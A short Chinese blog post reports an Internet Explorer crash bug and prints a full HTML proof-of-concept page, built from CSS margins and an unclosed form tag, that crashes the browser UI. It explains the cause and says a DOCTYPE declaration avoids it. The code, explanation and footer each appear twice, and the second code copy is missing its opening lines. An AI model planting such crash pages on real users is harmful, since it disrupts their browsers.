微软IE DOS漏洞
刚才在乌云漏洞发现个很搞笑很无厘头的漏洞举报:由于微软IE浏览器的Css处理导致的浏览器崩溃。。。
<html><head>
<style>
#a {
margin:0 10px 10px;
}
#b {
width:100%;
}
</style>
</head>
<body>
<table><tr><td>
<div id="a">
<form id="b">
<input type="text">
</div>
</td><td width="1"></td></tr></table>
<body>
<html>
<style>
#a {
margin:0 10px 10px;
}
#b {
width:100%;
}
</style>
</head>
<body>
<table><tr><td>
<div id="a">
<form id="b">
<input type="text">
</div>
</td><td width="1"></td></tr></table>
<body>
<html>
把上述html复制到一个空txt文件中,再把txt的文件后缀名替换成html,打开就发现浏览器UI崩溃了。
仔细看看,div内的form标签没有完整结束,所以导致了IE崩溃。
其实在代码的最上一排加上<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">,这样申明一下html版本,问题就没了。
但这个不是问题的问题也告诉我们,html的标签一定要有始有终!
仔细看看,div内的form标签没有完整结束,所以导致了IE崩溃。
其实在代码的最上一排加上<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">,这样申明一下html版本,问题就没了。
但这个不是问题的问题也告诉我们,html的标签一定要有始有终!
作者:牦牛
出处:http://maoniu602.cnblogs.com/
关于:我等因无形而恐惧,于是挥下刀刃,以假面之名......
说明:本文版权归作者和博客园共有,欢迎转载,但未经作者同意必须保留此段声明,且在文章页面明显位置给出原文连接,否则保留追究法律责任的权利。
出处:http://maoniu602.cnblogs.com/
关于:我等因无形而恐惧,于是挥下刀刃,以假面之名......
说明:本文版权归作者和博客园共有,欢迎转载,但未经作者同意必须保留此段声明,且在文章页面明显位置给出原文连接,否则保留追究法律责任的权利。